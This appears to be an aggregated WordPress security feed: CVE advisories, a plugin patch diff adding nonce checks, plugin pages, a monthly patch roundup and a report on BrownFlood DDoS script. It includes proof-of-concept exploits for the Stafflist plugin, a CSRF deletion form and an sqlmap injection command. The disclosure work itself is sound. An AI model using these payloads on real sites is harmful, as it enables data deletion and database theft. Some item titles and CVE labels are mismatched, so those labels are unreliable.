The Event List WordPress plugin before 0.8.8 does not sanitise and escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks against other admin even when the unfiltered_html is disallowed

CVE-2022-0418

The Ad Invalid Click Protector (AICP) WordPress plugin before 1.2.7 does not have CSRF check deleting banned users, which could allow attackers to make a logged in admin remove arbitrary bans

Timestamp:

04/05/2022 12:27:06 PM (4 weeks ago)

isaumya

Message:

Adding nonce support for deletion of banned users  

Location:

ad-invalid-click-protector/trunk/inc

Files:

  

*   admin\_setup.php (1 diff)
*   banned\_user\_table.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **ad-invalid-click-protector/trunk/inc/admin\_setup.php**
    
    r2656496
    
    r2705068
    
     
    
    523
    
    523
    
                $bannedUserTableOBJ = new AICP\_BANNED\_USER\_TABLE();
    
    524
    
    524
    
                $aicpOBJ = new AICP();
    
    525
    
     
    
                if( 'delete'=== $bannedUserTableOBJ->current\_action() ) {
    
    526
    
     
    
                    global $wpdb;
    
    527
    
     
    
                    $fetchedID = $\_REQUEST\['id'\];
    
    528
    
     
    
                    if( is\_array( $fetchedID ) ) { // for bulk operation arry will return
    
    529
    
     
    
                        $selectedID = implode( ',', array\_fill( 0, count( $fetchedID ), '%d' ) );
    
    530
    
     
    
                    } else { //for singel delete just the id will return
    
    531
    
     
    
                                $selectedID = '%d';
    
    532
    
     
    
                    }
    
    533
    
     
    
                    if( empty( $selectedID ) ) {
    
    534
    
     
    
                        $this->delete\_notice( false );
    
    535
    
     
    
                    } else {
    
    536
    
     
    
                        $query = $wpdb->prepare(
    
    537
    
     
    
                                    "DELETE FROM {$aicpOBJ->table\_name} WHERE {$aicpOBJ->table\_name}.id IN ($selectedID)",
    
    538
    
     
    
                                    $fetchedID
    
    539
    
     
    
                                );
    
    540
    
     
    
                        $wpdb->query( $query );
    
    541
    
     
    
                        $this->delete\_notice( true );
    
    542
    
     
    
                    }
    
    543
    
     
    
                }
    
    544
    
     
    
                /\* End of handelling the deletion process \*/
    
    545
    
     
    
                /\* Now it's time to show our data \*/
    
     
    
    525
    
                if( ( 'delete'=== $bannedUserTableOBJ->current\_action() ) && isset( $\_REQUEST\['nonce'\] ) && wp\_verify\_nonce( $\_REQUEST\['nonce'\], 'delete\_banned\_user' ) ) {
    
     
    
    526
    
                    global $wpdb;
    
     
    
    527
    
                    $fetchedID = $\_REQUEST\['id'\];
    
     
    
    528
    
                    if( is\_array( $fetchedID ) ) { // for bulk operation arry will return
    
     
    
    529
    
                        $selectedID = implode( ',', array\_fill( 0, count( $fetchedID ), '%d' ) );
    
     
    
    530
    
                    } else { //for singel delete just the id will return
    
     
    
    531
    
                        $selectedID = '%d';
    
     
    
    532
    
                    }
    
     
    
    533
    
                    if( empty( $selectedID ) ) {
    
     
    
    534
    
                        $this->delete\_notice( false );
    
     
    
    535
    
                    } else {
    
     
    
    536
    
                        $query = $wpdb->prepare(
    
     
    
    537
    
                            "DELETE FROM {$aicpOBJ->table\_name} WHERE {$aicpOBJ->table\_name}.id IN ($selectedID)",
    
     
    
    538
    
                            $fetchedID
    
     
    
    539
    
                        );
    
     
    
    540
    
                        $wpdb->query( $query );
    
     
    
    541
    
                $this->delete\_notice( true );
    
     
    
    542
    
                    }
    
     
    
    543
    
                }
    
     
    
    544
    
                /\* End of handelling the deletion process \*/
    
     
    
    545
    
                /\* Now it's time to show our data \*/
    
    546
    
    546
    
                ?>
    
    547
    
    547
    
                <div class="wrap">
    
*   **ad-invalid-click-protector/trunk/inc/banned\_user\_table.php**
    
    r1565011
    
    r2705068
    
     
    
    34
    
    34
    
            public function column\_ip( $item ) {
    
    35
    
    35
    
                $actions = array(
    
    36
    
     
    
                    'delete'    => sprintf( '<a class="aicp\_delete" href="?page=%s&action=%s&id=%s">Delete</a>', $\_REQUEST\['page'\], 'delete', $item->id ),
    
     
    
    36
    
                    'delete'    => sprintf( '<a class="aicp\_delete" href="?page=%s&action=%s&id=%s&nonce=%s">Delete</a>', $\_REQUEST\['page'\], 'delete', $item->id, wp\_create\_nonce( 'delete\_banned\_user' ) ),
    
    37
    
    37
    
                );
    
    38
    
    38
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2022-0191: Changeset 2705068 – WordPress Plugin Repository

WordPress Stafflist plugin version 3.1.2 suffers from a cross site request forgery vulnerability.

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - CSRF (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A CSRF vulnerability exists in staff record remove functionality inWordPress Plugin Stafflist 3.1.2.This vulnerability allows an attacker to delete existing records bytriggring a CSRF html request, due to not validating wp_nouce token inthe request.# ExploitAs n authenticated user:<html>  <body>    <form action="http://localhost:10003/wp-admin/admin.php">      <input type="hidden" name="page" value="stafflist" />      <input type="hidden" name="remove" value="1" />      <input type="hidden" name="p" value="1" />      <input type="hidden" name="s" value="1" />      <input type="submit" value="Submit request" />    </form>  </body></html>

WordPress Stafflist 3.1.2 Cross Site Request Forgery

WordPress Stafflist plugin version 3.1.2 suffers from a remote SQL injection vulnerability.

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - SQL Injection(Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Vulnerable Code:$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?...  $where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR      LOWER(firstname) LIKE '%{$w}%' OR      LOWER(department)  LIKE '%{$w}%' OR      LOWER(email) LIKE '%{$w}%'" : "");# Vulnerable URLhttp://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]# POC```sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'--cookie="wordpress_cookies_paste_here"```# POC Imagehttps://prnt.sc/AECcFRHhe2ib

WordPress Stafflist 3.1.2 SQL Injection

Cross-Site Request Forgery (CSRF) leading to Arbitrary File Upload vulnerability in Rara One Click Demo Import plugin <= 1.2.9 on WordPress allows attackers to trick logged-in admin users into uploading dangerous files into /wp-content/uploads/ directory.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Do you love the demos of the themes made by Rara Theme? Or, need a guideline for setting up the themes?

Then, all you need is this plugin!

Rara One Click Demo Import plugin will help you import the demo content, including settings of the widgets and the customizer, with a click.

The demo content will make your website look like the preview of a theme so that you get a basic guideline for making your website.

Once installed and activated, Rara One Click Demo Import will be accessible through **Appearance > Rara Demo Import**.

If you use Premium themes made by Rara Themes, go to Pro Theme Demo Import tab and just click on ‘Import Now’ button and your website will look like the demo of the activated theme in no time.

If you use free themes made by Rara Themes, download the demo files from your Theme Documentation page, upload it using ‘Upload Demo File’ button on this plugin, and click Import Now. As simple as that.

You can find the detail documentation here

If you need help, contact our support team here.

This plugin is based on the ‘Theme Demo Import’ plugin by Themely, https://wordpress.org/plugins/theme-demo-import/

As well as the improved WP Import 2.0 plugin by @humanmade, https://github.com/humanmade/WordPress-Importer.

**License**

Rara One Click Demo Import uses the script of  
‘Theme Demo Import’ plugin by Themely,  
https://wordpress.org/plugins/theme-demo-import/  
Licensed under the GNU General Public License v2.0,  
http://www.gnu.org/licenses/gpl-2.0.html

Rara One Click Demo Import uses ‘WordPress Importer’ plugin script  
https://github.com/humanmade/WordPress-Importer  
(C) 2016 @humanmade  
Licensed under the GNU General Public License v2.0,  
http://www.gnu.org/licenses/gpl-2.0.html

**Copyright**

Rara One Click Demo Import is distributed under the terms of the GNU GPL.

This program is free software; you can redistribute it and/or modify  
it under the terms of the GNU General Public License as published by  
the Free Software Foundation; either version 2 of the License, or  
any later version (at your own risk).

This program is distributed in the hope that it will be useful,  
but WITHOUT ANY WARRANTY; without even the implied warranty of  
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  
GNU General Public License for more details.

You should have received a copy of the GNU General Public License along  
with this program; if not, write to the Free Software Foundation, Inc.,  
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

**Method 1:**

On your WordPress admin dashboard  
Visit ‘Plugins > Add New’  
Search for ‘RARA One Click Demo Import’ and install the plugin.  
Activate ‘RARA One Click Demo Import ’ from your Plugins page.

**Method 2:**

Download the plugin from WordPress.org repository  
On your WordPress admin dashboard, go to ‘Plugins> Add New> Upload Plugin’.  
Upload the downloaded plugin file (rara-one-click-demo-import.zip) and click ‘Install Now’  
Activate ‘Rara One Click Demo Import’ from your Plugins page.

Once the plugin is activated, you will find the actual import page in **Appearance > Rara Demo Import**

**I have activated the Rara One Click Demo Import plugin. Where can I find the plugin?**

You will find the plugin in _wp-admin -> Appearance -> Rara Demo Import_.

**Where are the demo import files and the log files saved?**

The files used in the demo import will be saved to the default WordPress uploads directory. An example of that directory would be: ../wp-content/uploads/2017/03/.

The log file will be registered in the _wp-admin -> Media_ section.

**I can’t activate the plugin because of a fatal error. What can I do?**

_Update: There is an admin error notice, stating that the minimal PHP version required for this plugin is 5.3.2._

You want to activate the plugin, but this error shows up:

_Plugin could not be activated because it triggered a fatal error_

This happens because your hosting server is using a very old version of PHP. This plugin requires PHP version of at least **5.3.x**, but we recommend version _5.6.x_. Please contact your hosting company and ask them to update the PHP version for your site.

\- Tried several times installing "tour-operator.1.2.5" after installation an extra theme showed up, uninstalled, installed again, two themes total. - Reset WP, install again, same issue. - First import proccess gave error 500. Solved, second try imported demo, but with errors. - Reset WP again, tried multiple times, none of imported anything.

Superfast damage to your site.

Error 503 every time I try to upload demo import file.

don't install this plug! this will be damage to your website and then you must restore your website!

Nice! this plugin is very helpful and easy to use

I recently downloaded the Rara Travel Theme which installed fine. Even though I had read other peoples reviews stating the import does not work. I can state it worked fine for me first time. I am running the latest version of Wordpress as of 25/07/18 with WooCommerce and so far so good no issues. I have even created a Child Theme just in case of future Theme Updates. So don't believe these 1 Star reviews. I am relatively new to Wordpress and I managed just fine. Thank You to the programmer who wrote the Theme and provided the Demo Content all for Free by the way. Really! Thank You!

Read all 7 reviews

“Rara One Click Demo Import” is open source software. The following people have contributed to this plugin.

Contributors

*    Rara Theme

**1.2.9**

*   WORDPRESS 5.6 AND PHP 8 COMPATIBILITY FIXES

**1.2.8**

*   ARRAY OFFSET ACCESS SYNTAX WITH CURLY BRACES FIXED

**1.2.7**

*   LINKS UPDATED

**1.2.6**

*   UPLOAD BUTTON ISSUE FIXED

**1.2.5**

*   INFORMATION ADDED

**1.2.1**

*   COMPATIBILITY TEST

**1.2.0**

*   MAJOR UPDATE
*   DEMO FILE ZIP NAME STANDARDS

**1.1.0**

*   WARNING MESSAGE FIXED

**1.0.9**

*   WARNING MESSAGE FIXED

**1.0.8**

*   CODE CLEAN UP & DESIGN FIXES

**1.0.7**

*   CODE CLEAN UP
*   SOME OPTIONAL FUNCTIONS REMOVED

**1.0.6**

*   DEMO IMPORT PROCESS EASED

**1.0.5**

*   RARA THEME DEPENDENT

**1.0.4**

*   COMPATIBILITY TEST

**1.0.3**

*   PLUGIN DEPENDENCY CHECK
*   COMPATIBILITY TEST

**1.0.2**

*   CODE CLEANUP

**1.0.1**

*   CLASSES ADDED
*   FILTERS ADDED

**1.0.0**

*   INITIAL RELEASE

CVE-2022-29451: Rara One Click Demo Import

Multiple (13x) Cross-Site Request Forgery (CSRF) vulnerabilities in WPKube's Subscribe To Comments Reloaded plugin <= 211130 on WordPress allows attackers to clean up Log archive, download system info file, plugin system settings, plugin options settings, generate a new key, reset all options, change notifications settings, management page settings, comment form settings, manage subscriptions > mass update settings, manage subscriptions > add a new subscription, update subscription, delete Subscription.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Subscribe to Comments Reloaded is a robust plugin that enables commenters to sign up for e-mail notification of subsequent entries. The plugin includes a full-featured subscription manager that your commenters can use to unsubscribe to certain posts or suspend all notifications. It solves most of the issues that affect Mark Jaquith’s version, using the latest WordPress features and functionality. Plus, allows administrators to enable a double opt-in mechanism, requiring users to confirm their subscription clicking on a link they will receive via email or even One Click Unsubscribe.

**Requirements**

*   WordPress 4.0 or higher
*   PHP 5.6 or higher
*   MySQL 5.x or higher

**Main Features**

*   Easily manage and search among your subscriptions
*   Imports Mark Jaquith’s Subscribe To Comments (and its clones) data
*   Messages are fully customizable, no poEdit required (and you can use HTML!) with a Rich Text Editor – WYSIWYG
*   Disable subscriptions for specific posts
*   One Click Unsubscribe
*   Get and Download your System information for better support.

**Language Localization**

If you would like to help out translating the plugin to your language you can do so through the official WordPress plugin translation system

1.  If you are using Subscribe To Comments by Mark Jaquith, disable it (no need to uninstall it, though)
2.  Upload the entire folder and all the subfolders to your WordPress plugins’ folder. You can also use the downloaded ZIP file to upload it.
3.  Activate it
4.  Customize the Permalink value under Settings > Subscribe to Comments > Management Page > Management URL. It **must** reflect your permalinks’ structure
5.  If you don’t see the checkbox to subscribe, you will have to manually edit your template, and add <?php global $wp_subscribe_reloaded; if (isset($wp_subscribe_reloaded)){ echo $wp_subscribe_reloaded->stcr->subscribe_reloaded_show(); } ?> somewhere in your comments.php
6.  If you’re upgrading from a previous version, please **make sure to deactivate/activate** StCR.
7.  You can always install the latest development version by taking a look at this Video

**Are there any video tutorials?**

Yeah, I have uploaded a few videos for the following topics:

1.  Issues Updating StCR via WordPress Update
2.  Issues with StCR links see StCR Clickable Links
3.  Issues with empty emails or management messages? see StCR Management Message
4.  Upgrading from the latest development version see Upgrading

**Why my notifications are not in HTML format?**

Don’t worry, just go to the Options tab an set to Yes the **Enable HTML emails** option.

**How can I reset all the plugin options?**

There is a new feature called **Safely Uninstall** that allow you to delete the plugin using the WordPress plugin interface. If you have the option set to **Yes** everything but the subscriptions created by the plugin will be wipeout. So after you made sure that you have this option to **Yes** you can deactivate the plugin and the delete it. Now you have to install the plugin via WordPress or Upload the plugin zip file and activate it, after this step all your settings will be as default and your subscriptions will remain.  
There is a new feature added on the Options tab where you can reset all the settings by using only one click. You can either wipe out all the subscriptions or keep them.

**What can I do if the \*\*Safely Uninstall\*\* does not have any value?**

Just deactivate and activate the plugin and you are all set. The default value will be **Yes**.

**Aaargh! Were did all my subscriptions go?**

No panic. If you upgraded from 1.6 or earlier to 2.0+, you need to deactivate/activate StCR, in order to update the DB structure. After the version 180212 a fix was applied so that you can see all the subscriptions.

**Can I customize the layout of the management page?**

Yes, each HTML tag has a CSS class or ID that you can use to change its position or look-and-feel.

**How do I disable subscriptions for a given post?**

Add a custom field called stcr_disable_subscriptions to it, with value ‘yes’

**How do I add the management page URL to my posts?**

Use the shortcode [subscribe-url], or use the following code in your theme:  
global $wp\_subscribe\_reloaded; if (isset($wp\_subscribe\_reloaded)){ echo ‘Subscribe“;

**Can I move the subscription checkbox to another position?**

Yes! Just disable the corresponding option under Settings > Comment Form and then add the following code where you want to display the checkbox:  
stcr->subscribe\_reloaded\_show(); } ?>

**What if after update to the version 141024 I still see plain HTML messages?**

The information of your configuration needs to be updated. Go to the Subscribe to Comments Reloaded settings and click the Save Changes button on the tab  
where you have you messages with HTML.

**How to generate a new Key for my Site?**

Just go to the Options Panel and click the generate button. By generating a new key you prevent the spam bots to steal your links.

People from my website, who made subscription for comments, said that in e-mail they get the IP of user, who left the comment. I\`m going to find another plugin.

I have the v.210315 I translated it into Italian 100% with Loco translated, but I noticed that in the plugin there are still many entries in English.

Just installed this as an alternative to setting up a forum, which seemed too much like hard work! Love it so far, very easy to set up and I like the fact that every item has a "?" so you can find out what it means before setting it.

Believe me guys, I tried all the plugins out there available for comment subscription and this is the only plugin that is robust, reliable and with continuous support from the author for a very long time. And guess what it's completely free. Thanks a lot for this wonderful plugin. All the best for your great success.

A fabulous plugin that helps people to stay engaged with the posts they appreciate much. Thank you!

If I had written design specs for a plugin and commissioned someone to write it, the result would not have been as good as this plugin is. Setting up this plugin it quickly becomes apparent that a lot of real-world experience has been incorporated into it over the years. The end result is, that it works like a dream and totally exceeds my expectations. Thanks so much!

Read all 156 reviews

“Subscribe To Comments Reloaded” is open source software. The following people have contributed to this plugin.

Contributors

*    WPKube

**v211130**

*   **Fix** Removed custom error handler (thanks to JakeQZ for bringing the issue to our attention)
*   **Fix** Processing form submission in subscribe.php is now stopped in case “subscribe without commenting” is enabled

**v211019**

*   **Fix** Issue with STCR output on non-virtual management page

**v210315**

*   **Fix** Removed the “need help” added via “contextual\_help” (deprecated)
*   **Fix** PHP 8 deprecated notice
*   **Fix** Fix issue with missing submit button when using “stcr\_disable\_subscription” custom field
*   **Tweak** Bump up WP “tested up to” version to 5.7

**v210126**

*   **New** Option to disable the “subscribe without commenting” and “request management link” pages. ( WP Admin > StCR > Management Page )

**v210110**

*   **Fix** Limit subscription types on the management page when only a specific subscription is allowed
*   **Fix** JS error on front-end

**v210104**

*   **New** Google reCAPTCHA now available for the “subscribe without commenting” and “request management subscription” form (WP admin > StCR > Options)
*   **Improvement** When using the checkbox (not the select box from advanced subscription) you can now select the subscription type (all or replies) (WP admin > StCR > Comment Form)
*   **Improvement** \[comment\_author\] can now be used in the Notification subject (WP admin > StCR > Notifications)
*   **Improvement** Replaced final instances of jQuery code to be raw JavaScript (not rely on jQuery)
*   **Fix** The form to “request management link” will now check if that email is a subscriber before sending a link
*   **Fix** Issue with broken option tooltips on Notifications settings page
*   **Tweak** Removed HTML comments around the plugin’s output on the frontend

**v200813**

*   **Fix** Error when permanently deleting a post/page/… (related to WP 5.5 change in the “delete\_post” hook coming with a 2nd parameter)

**v200629**

*   **New** Option to show the subscription checkbox/select only for logged in users (option called “Enable only for logged in users” and located in WP admin > StCR > Options)
*   **New** Added \[comment\_date\] and \[comment\_time\] shortcodes which can be used in the “notification message”.
*   **Improvement** Challenge question/answer now shows on “request management link” page as well
*   **Improvement** Replaced multiple instances of jQuery code to be raw JavaScript (not rely on jQuery)
*   **Tweak** Added label for the checkbox in “Screen Options”
*   **Tweak** Email input value fallback to “email” removed
*   **Fix** Subscriptions will no longer duplicate when post is copied/duplicated with the “Duplicate Post” plugin
*   **Fix** Fixed issue with PHP notice when $comment object does not have comment\_approved set
*   **Fix** The jQuery code that handles moving the position of the checkbox is now added later on in the code to avoid issue when jQuery gets loaded in the footer

**v200422**

*   **New** Arabic translation, thanks to Yaser Maadan
*   **Fix** WP\_PLUGIN\_URL replaced by plugins\_url()
*   **Fix** Issue with “generate new key” button for “StCR Unique Key” not working (WP Admin > StCR > Options)
*   **Fix** Issue with ordering by date in the subscription management table (WP Admin > StCR > Manage subscriptions)
*   **Fix** Issue with management page ( /comment-subscriptions/ ) being shown for child pages as well ( /comment-subscriptions/something-else/ )
*   **Fix** Corrections in Hungarian translation
*   **Tweak** Some other minor tweaks

**v200205**

*   **New** Function for developers to add subscribers. Check the guide
*   **New** Option to set a challenge (question + answer) for the “subscribe without commenting” form to prevent automatic bot submissions
*   **Fix** It is now possible to send out plain text emails instead of HTML emails. Check the guide
*   **Fix** It is now possible for visitors to subscribe to comments when the comments are only open for logged in users and the visitor is not logged in
*   **Fix** Corrections in German translation

**v191217**

*   **Improvement** Option to enable/disable the plugin from setting cookies (email address after subscription)
*   **Improvement** German translation improvements (thanks to Greendroid)

**v191209**

*   **Improvement** Logged in users no longer need to submit the “email” form on a subscription page in order to access their subscriptions
*   **Improvement** Ability to filter/search the subscriptions table ( WP admin > StCR > Manage Subscriptions ) when there are more than 1000 subscriptions

**v191028**

*   **Fix** Issue with “Default Checkbox Value” not being saved
*   **Fix** Issue with /comment-subscriptions taking to 404 ( when it does not end with / )
*   **Tweak** Error notification when \[manager\_link\] used in “Management Page message”.

**v191011**

*   **Fix** Revert changes to error logging due to PHP errors/warnings

**v191009**

*   **Fix** Issue with post slug being displayed instead of the post title on unsubscribe
*   **Fix** HTML validation error in subscribe template
*   **Fix** Fix German translation “Nicht abonnieren”
*   **Fix** Fix import data from Subscribe Reloaded by Mark Jaquith
*   **Fix** Issue with using double quotes in options
*   **Tweak** Show a message to the comment author to check his email to confirm subscription
*   **Tweak** Performance improvement for error logging

**v190529**

*   **Fix** Issue with being unable to dismiss admin notices shown by StCR
*   **Fix** Virtual management page was still being shown even when disabled

**v190523**

*   **Fix** Remove the old system information functionality

**v190510**

*   **New** Option to only enable the functionality for blog posts ( option named “Enable only for blog posts” located in WP admin > StCR > StCR Options)
*   **Tweak** Info on subscriber and subscriptions amount moved into separate table
*   **Fix** Text domain

**v190426**

*   **New** Info on the amount of subscribers and subscriptions added in WP admin > StCR > StCR System
*   **Fix** Text domain (for translations) has been changed to the correct domain (from subscribe-reloaded to subscribe-to-comments-reloaded)
*   **Fix** Issue with undefined is\_rtl function
*   **Fix** Missing blank space between sentences (below comment form when subscribed)
*   **Fix** Undefined variable notices for $order\_status and $order\_dt
*   **Fix** Temporarily hidden an unused option in StCR > Management Page to avoid confusion.
*   **Fix** Removed localization for non textual strings
*   **Fix** Fixed incorrectly localized textual strings

**v190412**

*   **Fix** Issue with JavaScript code that is supposed to show the form when “StCR Position” is enabled

**v190409**

*   **Fix** Post author was notified of new comments even if they are awaiting approval, no need for this since WordPress itself sends out an email in that case
*   **Fix** Post author was notified twice ( if he was subscribed and “subscribe authors” was enabled )
*   **Fix** Issue with “StCR Position” option ( for older/outdated themes ) not working properly
*   **Fix** Issue with wrong translation in German
*   **Tweak** The “Action” select box labels on “Manage Subscriptions” page tweaked to be more descriptive

**v190325**

*   **New** Shortcode for manage page content (to be used on non-virtual management page). The shortcode is \[stcr\_management\_page\]
*   **Rewrite** New method for downloading system information file
*   **Fix** The admin panel CSS and JavaScript files now load only on StCR pages
*   **Fix** Tooltips not showing up on System options page
*   **Fix** Conflict with MailChimp for WP plugin (comment filter received echo instead of return which caused the issue)
*   **Fix** Issue with select/deselect all on management page
*   **Tweak** The MySQL requirements info on the system page now uses WordPress requirements
*   **Tweak** The post author will no longer be notified of his/her own comments

**v190305**

*   **Fix** Issue with “Subscribe authors” functionality sending the emails to administrator instead of the post author

**v190214**

*   **Fix** String error calling the Curl Array.
*   **Fix** wrong array definition that was breaking the site in some newer PHP versions.
*   **Fix** error by calling $wp_locale that was not needed.
*   **Fix** wrong label on option issue #467.
*   **Fix** typo en help description issue #468.

**v190117**

*   **Fix** missing checkbox when the option **StCR Position** was set to **Yes**.
*   **Fix** styles on admin notices.
*   **Fix** filenames to match the correct menu name.
*   **Fix** \# issue#431 and issue#444.
*   **Fix** warning message that was notifying the server when the Management URL was empty. Now the field must have a value. Props @breezynetworks on WordPress Forum
*   **Fix** value of management page to get it on the event insteadof page load.
*   **Add** translation for Subs Table, Add PHP error logger.
*   **Add** Plugin information on Cards.
*   **Add** the Phing build script to automate the deployment and testings.
*   **Add** WebUI Popover library to display the help messages in a clear way.
*   **Add** dropdown menu on the options tab to include the System menu.
*   **Add** option to download the system report.
*   **Add** functionality to create the system report via Ajax.
*   **Add** cron to clean house the system report file.
*   **Upgrade** the **Comment Form** Panel 2 options.
*   **Upgrade** the **Management Page** panel.
*   **Upgrade** the **Options** Panel.
*   **Upgrade** the **Support** Panel.
*   **Upgrade** the **StCR System** Menu.
*   **Update** font awesome refrences.
*   **Update** Admin Menus with Bootstrap.
*   **Implement** Pagination using plugins and fix responsive layout of management page.
*   **Implement** SASS for the CSS files.
*   **Implement** a cache array for the menu options.
*   **Remove** unecessary components from Composer.
*   **Remove** double inclusion of Font Awesome.
*   **Modify** Bower, Gulp and Phing files to implement WebUI Popover.
*   **Refactor** the options saving process.
*   **Refactor** code to move the functional saving options to the Utils Class.
*   **Set** the Double Verification option to yes.
*   **Create** array of options for improve support.
*   **Sanitize** input and out of data preventing XSS. Code modification and suggestion by @jnorell.
*   **Re Word** option to avoid missleading to new users. Props @padraigobeirn.
*   **Move** the plugin core files to the folder **src** in order to implement npm and bower task managers.

**v180225**

*   **Fix** error when a user subscribe to a new post and the double opt-in was enable, preventing the double opt-in not sending the email message. Issue#350.
*   **Add** email and post id validation on the StCR backened.
*   **Add** email, search and post id validation on the frontend.
*   **Add** backened validation for input data (email) on the subscribe and request management pages.
*   **Add** debug messages to improve support.
*   **Add** feature to change the date format output on the management page for both the User page and Author. See issue#345.
*   **Remove** the inclusion of the plugin scripts with WP enqueue. This will load only the needed script on specific pages. Will remove request to the server to get scripts.

CVE-2022-29414: Subscribe To Comments Reloaded

Plus: Microsoft patched some 100 flaws, while Oracle issued more than 500 security fixes.

To find the update, you’ll need to check your device settings. Devices that have received the Android April update so far include Google’s Pixel devices and some third-party Android phones, including the Samsung Galaxy A32 5G, A51, A52 5G, A53 5G, A71, S10 series, S20 series, Note20 series, Z Flip 5G, Z Flip3, Z Fold, Z Fold2, and the Z Fold3, as well as the OnePlus 9 and OnePlus 9 Pro.

Google Chrome Emergency Updates

As the world’s biggest browser with over 3 billion users, it’s no surprise attackers are targeting Google Chrome. Browser-based attacks are particularly worrying because they can potentially be chained together with other vulnerabilities and used to take over your device.

It has been a particularly busy month for the team behind Google’s Chrome browser, which has seen several security updates within weeks of each other. The latest, pushed out in mid-April, fixes two issues including a high-severity zero-day vulnerability, CVE-2022-1364, which is already being used by attackers.

The technical details aren’t currently available, but the timing of the fix—just a day after it was reported—indicates it’s pretty serious. If you use Chrome, your browser should now be on version 100.0.4896.127 to include the fix. You’ll need to restart Chrome after the update has installed to ensure it activates.

The Chrome issue also impacts other Chromium-based browsers, including Brave, Microsoft Edge, Opera, and Vivaldi, so if you use one of those, make sure you apply the patch.

But that’s not all. On April 27, Google announced another Chrome update, fixing 30 security vulnerabilities. None of these have been exploited yet, the company says, but seven are rated as being a high risk. The update takes the browser to version 101.0.4951.41.

Oracle’s April 2022 Critical Patch Update

In mid-April, Oracle released its quarterly Critical Patch Update, including a whopping 520 security fixes. Some of the issues fixed in the update are serious—300 of them can be exploited remotely without authentication, and 75 security issues are rated as critical severity. Some of the Oracle patches address CVE-2022-22965, aka Spring4Shell, a remote code execution (RCE) flaw in the spring framework.

Microsoft’s Busy April Patch Tuesday

Microsoft had a major Patch Tuesday in April, issuing fixes for over 100 vulnerabilities, including 10 critical RCE flaws. One of the most important, CVE-2022-24521, is already being exploited by attackers, according to the company.

Reported by the NSA and researchers at CrowdStrike, the issue in the Windows Common Log File system driver doesn’t require human interaction to be exploited and can be used to obtain administrative privileges on a logged-in system. Other notable fixes include CVE-2022-26904—a publicly known issue—and CVE-2022-26815, a severe DNS Server flaw.

Mozilla Thunderbird 91.8.0 Fix

On April 5, Mozilla released a patch to fix security issues in its Thunderbird email client as well as its Firefox browser. The details are scant, but Thunderbird 91.8 fixes four vulnerabilities rated as having a high impact, some of which could be exploited to run arbitrary code.

Firefox ESR 91.8 and Firefox 99 also fix multiple security issues.

WordPress Plugin Elementor Version 3.6.3 

The Elementor website builder plug-in for WordPress has received a big security fix in April for a critical-rated vulnerability that could allow attackers to perform remote code execution and effectively take over a website.

Found by researchers at Plugin Vulnerabilities, the flaw was introduced in the plug-in in version 3.6.0, released on March 22. “We would recommend not using this plugin until it has had a thorough security review and all issues are addressed,” the researchers said.

Although the attacker must be authenticated to exploit the issue, it’s still pretty serious because anyone logged into an affected website can exploit it. The update for Elementor’s 5 million users, version 3.6.3, should be applied as soon as possible.

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   This startup wants to watch your brain
*   The artful, subdued translations of modern pop
*   Netflix doesn't need a password-sharing crackdown
*   How to revamp your workflow with block scheduling
*   The end of astronauts—and the rise of robots
*   👁️ Explore AI like never before with our new database
*   ✨ Optimize your home life with our Gear team’s best picks, from robot vacuums to affordable mattresses to smart speakers

You Need to Update iOS, Android, and Chrome Right Now

We can't tell which party made the first move, but both the pro-Ukraine and Russian sides have been exchanging DDoS attacks.
The post Ukraine government and pro-Ukrainian sites hit by DDoS attacks appeared first on Malwarebytes Labs.

The Computer Emergency Response Team in Ukraine (CERT-UA) has announced that Ukraine government web portals and pro-Ukraine sites are subjected to ongoing DDoS (distributed denial of service) attacks. They don’t currently know who is behind these attacks.

The attack involves injecting a malicious JavaScript (JS)—officially named “BrownFlood”—into compromised WordPress sites, arming them with the ability to DDoS sites. The script, which is encoded in base64 to avoid detection, is injected into the HTML structure of the sites’ main files. Whoever visits these sites are then turned into an unknowing accomplice to an online attack they are unaware of.

Target URLs are defined in the code.

_BrownFlood in a compromised WordPress site (Source: CERT-UA)_

Even the owners of these compromised WordPress sites do not realize that they were involuntarily signed up for a cause against Ukraine.

BleepingComputer revealed that the same JS script shared on GitHub had been involved in a DDoS attack a month ago against a smaller pool of pro-Ukraine sites. It then came to light that a particular pro-Ukrainian site had used the same DDoS code to target Russian sites.

CERT-UA worked closely with the National Bank of Ukraine to strengthen its defensive stance against DDoS attacks. The agency also informed WordPress site owners of their compromise and provided guidance on detecting and removing the malicious JS.

_Screenshot of event log WordPress admins should watch out for to know if they are infected (Source: CERT-UA)_

CERT-UA listed three recommendations for WordPress site admins to follow, which we have replicated the translated version of below:

1.  Take steps to detect and remove malicious JavaScript code.
2.  Provide up-to-date \[active plug-ins\] and up-to-date support for website content management systems (CMS).
3.  Restrict access to website management pages.

The agency also provided a detection tool (scroll down to the bottom of the page) admins can use to scan their sites.

Ukraine government and pro-Ukrainian sites hit by DDoS attacks

Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS) in Mufeng's Hermit ????? plugin <= 3.1.6 on WordPress via &title parameter.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of April 25, 2022 and is not available for download. This closure is temporary, pending a full review.

